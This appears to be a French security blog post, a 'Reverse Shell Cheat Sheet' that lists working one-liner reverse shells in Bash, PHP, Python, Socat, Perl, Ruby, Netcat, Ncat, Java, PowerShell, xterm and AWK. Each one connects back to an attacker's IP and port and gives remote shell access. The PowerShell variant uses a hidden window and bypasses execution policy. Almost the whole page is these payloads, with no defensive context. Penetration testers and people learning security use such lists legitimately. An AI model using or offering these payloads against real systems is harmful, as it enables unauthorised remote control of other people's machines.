GEEKPRATIK
28Avr/20

Reverse Shell Cheat Sheet

A reverse shell is a shell session established on a connection that is initiated from a remote machine a reverse shell is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, which by using, code or command execution is achieved

Reverse Shell Content Replace

ip-address = Attacker ip address
port = Attacker port

Bash Reverse Shell

bash -i >& /dev/tcp/ip-address/port 0>&1

PHP Reverse Shell

php -r '$sock=fsockopen("ip-address",port);exec("/bin/sh -i <&3 >&3 2>&3");'

Python Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip-address",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Socat Reverse Shell

Attacker Payload Listener
socat file:`tty`,raw,echo=0 TCP-L:port
Client Side
/dev/shm exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ip-address:port

Perl Reverse Shell

perl -e 'use Socket;$ip="ip-address";$port=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($port,inet_aton($ip)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Perl Windows Reverse Shell

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ip-address:port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby Reverse Shell

ruby -rsocket -e'f=TCPSocket.open("ip-address",port).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat Reverse Shell

nc  ip-address port -e /bin/sh

Ncat Reverse Shell

ncat ip-address port -e /bin/bash

Java Reverse Shell

r = Runtime.getRuntime()
p = r.exec(["/bin/sh","-c","exec 5<>/dev/tcp/ip-address/port;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Power-Shell Reverse Shell

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("ip-address",port);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

xTerm Reverse Shell

xterm -display ip-address:port

AWK Reverse Shell

awk 'BEGIN {s = "/inet/tcp/0/ip-address/port"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
Partager sur Facebook Partager sur Google+ Partager sur Digg Partager sur Reddit Partager sur Delicious Partager sur Delicious Partager sur Delicious Partager sur folkd
Remplis sous: Sécurité Laisser un commentaire
12/11/2021
Commentaires ()

Aucun commentaire pour l'instant


Poster un commentaire

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.

Trackbacks are disabled.

» «

Catégories

Articles récents

Suivre GeekPratik par mail